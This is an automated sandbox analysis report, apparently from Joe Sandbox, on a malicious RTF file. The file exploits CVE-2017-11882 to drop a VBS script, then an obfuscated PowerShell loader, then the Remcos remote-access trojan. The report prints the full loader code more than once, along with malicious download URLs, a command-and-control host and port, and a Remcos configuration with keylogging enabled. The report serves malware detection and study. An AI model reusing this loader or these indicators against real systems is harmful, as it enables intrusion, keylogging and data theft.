rLHnyjTQ6zn0qE6SrOQCIe3FfGGvicERREowxQvbpIw9uSzA17OsC636M5zXSToQgHiyAkm/dDk+wHfmDJGIsVE2wRGDtoq0Qt+tGgtB9Bi3fKJGvPBCuWm1jPuHv/LpyDiDNqEldTLSKZiQIIVm6lT/bYy7Al9K4rBqB6iJEpuxyHndJU46lXfgraSgD2XgA6ahTGriaCII6EAxgJSunErp5iVOk6tfQCtMutwbB720ZK5BpUkQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
                Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIuNSTmXUI0HgFw3fdM1ERT/tun0uBDlOiQyHJlmXQIhnecjctgQ65PlKspfuRkCDRjEPH4Ihki2Ib6LDmK9phm3xXkeNi+fcKsxPwgqQcHOTbxmi5gehOXzdiLKULSMHsRGtrAT4hLirjCliJFHhPPoPAD8WrrNJOauPIbQ8LjKCbYXN79XvsHb07Yd11FEz/xBrM4eb0d6oDjgTxHYLrzF6J4EfbA9GRGmdc4tkwy2zlMYr0bFEZ+TXcIkX6MoawoDSDQCJz8W7GBp0wX7cDBpIBhIxab4r+prVGaCCG+0+3uEp7n/keTDVANuLUjK7WM0vFCbyd/wVRtzF4youZwmOc3oaCF/JrShl+say08x0QppsCNvWz86ojjUOePGJsv67aspbPc+MT7ExHDG3Nzcev9OvNfYyq2MjA+OyHp/F7vijb0t7gbDYnwMe4HIfBgRkZkghh0vLgZbfSOZQmmNYaTrwwNG1StWUKeon1TmwO+GG02RY5xYL9dVsfOHoro3YjN0N+knyfSiTSLd8VpRGssVO3vdtrX83PC61AEKuwGmOKozlk3nzEbypC+P8jH/rC5lWjA5zr77TSv/3mL20F7OS9KdMcYBjEGjeQBi2Go74vJ2WeLC1Ow7MmkVoHZMjPL4LBdcCDe3+RcMbiLQBYCalcm5AUNss21ha2+mb9sY0foP8Ez4UEfMsUX1rlQ2L4c8NimJOaGijgqysi/8/4pvNnD/sDhqf9Jv/RJy+DJdtvGCjd3eg+777E0i3Zy2WWu4edO5corcrRaO0QH5KUcez0fY+pfnv3ycP5Njlg3ee0PHZw6sMPAER25mwo6SdwnN/dBC6KJXCNuDMBO0NSgE1NaaMlVsvxYB09SoTLfOQfkI1HTVgxNTWGoMCwSo9fQJZ6v2G6lGAw0fSjKOC9ekynuz2I6aDEVQhjeBtb0xHr2FEqYELQ/pZpkSkEkGIt2Hk3LvIWcMIenJWqnjfen61s15Yu2EdgjIt9Mn3N8vSlm2edKYHvSDcmrf7Gu/P8wb6OKnXNHosYcBbbFwXBRtzLtR07JaIq87PiGQKXkLtiP+St5jLN1RKHuViNAKANGwfM28rb84mkuqGiXByiubZnTAtp97cvhahwn4PXpi1Kez7/kbaDDKXCvVKN3TK4hLXC8Ot+rpc8CCzkwpZACGoSzxk3WPrLHnyjTQ6zn0qE6SrOQCIe3FfGGvicERREowxQvbpIw9uSzA17OsC636M5zXSToQgHiyAkm/dDk+wHfmDJGIsVE2wRGDtoq0Qt+tGgtB9Bi3fKJGvPBCuWm1jPuHv/LpyDiDNqEldTLSKZiQIIVm6lT/bYy7Al9K4rBqB6iJEpuxyHndJU46lXfgraSgD2XgA6ahTGriaCII6EAxgJSunErp5iVOk6tfQCtMutwbB720ZK5BpUkQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
                Sigma detected: Suspicious Microsoft Office Child Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weseethesimplethingsalwaystog.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weseethesimplethingsalwaystog.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2644, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weseethesimplethingsalwaystog.vBS" , ProcessId: 976, ProcessName: wscript.exe
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weseethesimplethingsalwaystog.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weseethesimplethingsalwaystog.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2644, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weseethesimplethingsalwaystog.vBS" , ProcessId: 976, ProcessName: wscript.exe
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weseethesimplethingsalwaystog.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weseethesimplethingsalwaystog.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2644, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weseethesimplethingsalwaystog.vBS" , ProcessId: 976, ProcessName: wscript.exe
                Sigma detected: Modification of IE Registry Settings
                Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2644, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIuNSTmXUI0HgFw3fdM1ERT/tun0uBDlOiQyHJlmXQIhnecjctgQ65PlKspfuRkCDRjEPH4Ihki2Ib6LDmK9phm3xXkeNi+fcKsxPwgqQcHOTbxmi5gehOXzdiLKULSMHsRGtrAT4hLirjCliJFHhPPoPAD8WrrNJOauPIbQ8LjKCbYXN79XvsHb07Yd11FEz/xBrM4eb0d6oDjgTxHYLrzF6J4EfbA9GRGmdc4tkwy2zlMYr0bFEZ+TXcIkX6MoawoDSDQCJz8W7GBp0wX7cDBpIBhIxab4r+prVGaCCG+0+3uEp7n/keTDVANuLUjK7WM0vFCbyd/wVRtzF4youZwmOc3oaCF/JrShl+say08x0QppsCNvWz86ojjUOePGJsv67aspbPc+MT7ExHDG3Nzcev9OvNfYyq2MjA+OyHp/F7vijb0t7gbDYnwMe4HIfBgRkZkghh0vLgZbfSOZQmmNYaTrwwNG1StWUKeon1TmwO+GG02RY5xYL9dVsfOHoro3YjN0N+knyfSiTSLd8VpRGssVO3vdtrX83PC61AEKuwGmOKozlk3nzEbypC+P8jH/rC5lWjA5zr77TSv/3mL20F7OS9KdMcYBjEGjeQBi2Go74vJ2WeLC1Ow7MmkVoHZMjPL4LBdcCDe3+RcMbiLQBYCalcm5AUNss21ha2+mb9sY0foP8Ez4UEfMsUX1rlQ2L4c8NimJOaGijgqysi/8/4pvNnD/sDhqf9Jv/RJy+DJdtvGCjd3eg+777E0i3Zy2WWu4edO5corcrRaO0QH5KUcez0fY+pfnv3ycP5Njlg3ee0PHZw6sMPAER25mwo6SdwnN/dBC6KJXCNuDMBO0NSgE1NaaMlVsvxYB09SoTLfOQfkI1HTVgxNTWGoMCwSo9fQJZ6v2G6lGAw0fSjKOC9ekynuz2I6aDEVQhjeBtb0xHr2FEqYELQ/pZpkSkEkGIt2Hk3LvIWcMIenJWqnjfen61s15Yu2EdgjIt9Mn3N8vSlm2edKYHvSDcmrf7Gu/P8wb6OKnXNHosYcBbbFwXBRtzLtR07JaIq87PiGQKXkLtiP+St5jLN1RKHuViNAKANGwfM28rb84mkuqGiXByiubZnTAtp97cvhahwn4PXpi1Kez7/kbaDDKXCvVKN3TK4hLXC8Ot+rpc8CCzkwpZACGoSzxk3WPrLHnyjTQ6zn0qE6SrOQCIe3FfGGvicERREowxQvbpIw9uSzA17OsC636M5zXSToQgHiyAkm/dDk+wHfmDJGIsVE2wRGDtoq0Qt+tGgtB9Bi3fKJGvPBCuWm1jPuHv/LpyDiDNqEldTLSKZiQIIVm6lT/bYy7Al9K4rBqB6iJEpuxyHndJU46lXfgraSgD2XgA6ahTGriaCII6EAxgJSunErp5iVOk6tfQCtMutwbB720ZK5BpUkQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
                Sigma detected: Office Macro File Creation
                Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2404, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIuNSTmXUI0HgFw3fdM1ERT/tun0uBDlOiQyHJlmXQIhnecjctgQ65PlKspfuRkCDRjEPH4Ihki2Ib6LDmK9phm3xXkeNi+fcKsxPwgqQcHOTbxmi5gehOXzdiLKULSMHsRGtrAT4hLirjCliJFHhPPoPAD8WrrNJOauPIbQ8LjKCbYXN79XvsHb07Yd11FEz/xBrM4eb0d6oDjgTxHYLrzF6J4EfbA9GRGmdc4tkwy2zlMYr0bFEZ+TXcIkX6MoawoDSDQCJz8W7GBp0wX7cDBpIBhIxab4r+prVGaCCG+0+3uEp7n/keTDVANuLUjK7WM0vFCbyd/wVRtzF4youZwmOc3oaCF/JrShl+say08x0QppsCNvWz86ojjUOePGJsv67aspbPc+MT7ExHDG3Nzcev9OvNfYyq2MjA+OyHp/F7vijb0t7gbDYnwMe4HIfBgRkZkghh0vLgZbfSOZQmmNYaTrwwNG1StWUKeon1TmwO+GG02RY5xYL9dVsfOHoro3YjN0N+knyfSiTSLd8VpRGssVO3vdtrX83PC61AEKuwGmOKozlk3nzEbypC+P8jH/rC5lWjA5zr77TSv/3mL20F7OS9KdMcYBjEGjeQBi2Go74vJ2WeLC1Ow7MmkVoHZMjPL4LBdcCDe3+RcMbiLQBYCalcm5AUNss21ha2+mb9sY0foP8Ez4UEfMsUX1rlQ2L4c8NimJOaGijgqysi/8/4pvNnD/sDhqf9Jv/RJy+DJdtvGCjd3eg+777E0i3Zy2WWu4edO5corcrRaO0QH5KUcez0fY+pfnv3ycP5Njlg3ee0PHZw6sMPAER25mwo6SdwnN/dBC6KJXCNuDMBO0NSgE1NaaMlVsvxYB09SoTLfOQfkI1HTVgxNTWGoMCwSo9fQJZ6v2G6lGAw0fSjKOC9ekynuz2I6aDEVQhjeBtb0xHr2FEqYELQ/pZpkSkEkGIt2Hk3LvIWcMIenJWqnjfen61s15Yu2EdgjIt9Mn3N8vSlm2edKYHvSDcmrf7Gu/P8wb6OKnXNHosYcBbbFwXBRtzLtR07JaIq87PiGQKXkLtiP+St5jLN1RKHuViNAKANGwfM28rb84mkuqGiXByiubZnTAtp97cvhahwn4PXpi1Kez7/kbaDDKXCvVKN3TK4hLXC8Ot+rpc8CCzkwpZACGoSzxk3WPrLHnyjTQ6zn0qE6SrOQCIe3FfGGvicERREowxQvbpIw9uSzA17OsC636M5zXSToQgHiyAkm/dDk+wHfmDJGIsVE2wRGDtoq0Qt+tGgtB9Bi3fKJGvPBCuWm1jPuHv/LpyDiDNqEldTLSKZiQIIVm6lT/bYy7Al9K4rBqB6iJEpuxyHndJU46lXfgraSgD2XgA6ahTGriaCII6EAxgJSunErp5iVOk6tfQCtMutwbB720ZK5BpUkQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
                Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3076, TargetFilename: C:\Users\user\AppData\Local\Temp\qr14btjq.eoj.ps1

                Stealing of Sensitive Information

                barindex
                Sigma detected: Remcos
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 3228, TargetFilename: C:\ProgramData\remcos\logs.dat

                Snort Signatures

                No Snort rule has matched

                Suricata Signatures

                Timestamp:2024-07-29T16:15:12.077338+0200
                SID:2020424
                Source Port:80
                Destination Port:49165
                Protocol:TCP
                Classtype:Exploit Kit Activity Detected
                Timestamp:2024-07-29T16:15:08.856525+0200
                SID:2047750
                Source Port:80
                Destination Port:49164
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-29T16:15:13.845948+0200
                SID:2036594
                Source Port:49166
                Destination Port:6426
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-07-29T16:15:10.936453+0200
                SID:2049038
                Source Port:80
                Destination Port:49164
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:2024-07-29T16:15:15.887716+0200
                SID:2803304
                Source Port:49167
                Destination Port:80
                Protocol:TCP
                Classtype:Unknown Traffic

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: 4vzwJTZbwT.rtfAvira: detected
                Antivirus detection for URL or domain
                Source: http://172.245.123.11/47/weseethesimplethingsalwaystoget.gIFAvira URL Cloud: Label: malware
                Source: http://198.46.176.133/Upload/vbs.jpegAvira URL Cloud: Label: malware
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1F49877E-68B7-4001-A271-09D774B073D0}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
                Source: C:\Users\user\Desktop\~WRD0000.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
                Found malware configuration
                Source: 00000008.00000002.879647352.0000000000871000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "tochisglobal.ddns.net:6426:1", "Assigned name": "benchao", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-9R4HLX", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                Multi AV Scanner detection for submitted file
                Source: 4vzwJTZbwT.rtfReversingLabs: Detection: 50%
                Yara detected Remcos RAT
                Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.powershell.exe.3f87e48.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.powershell.exe.36e9a80.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.powershell.exe.3f87e48.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.879647352.00000000008B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.879647352.00000000008B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.879647352.0000000000871000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.879945414.0000000000DFE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.879647352.0000000000855000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.373610773.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3076, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3228, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,8_2_00433837
                Source: powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_117c5fa0-9

                Exploits

                barindex
                Yara detected UAC Bypass using CMSTP
                Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.powershell.exe.3f87e48.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.powershell.exe.36e9a80.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.powershell.exe.3f87e48.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.373610773.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3076, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3228, type: MEMORYSTR
                Found potential equation exploit (CVE-2017-11882)
                Source: Static RTF information: Object: 0 Offset: 000040F2h
                Office equation editor establishes network connection
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 172.245.123.11 Port: 80Jump to behavior
                Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
                Source: ~WRF{1F49877E-68B7-4001-A271-09D774B073D0}.tmp.0.drStream path '_1783753252/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                Source: ~WRF{1F49877E-68B7-4001-A271-09D774B073D0}.tmp.0.drStream path '_1783753289/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

                Privilege Escalation

                barindex
                Contains functionality to bypass UAC (CMSTPLUA)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004074FD _wcslen,CoGetObject,8_2_004074FD
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000006.00000002.375093729.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp
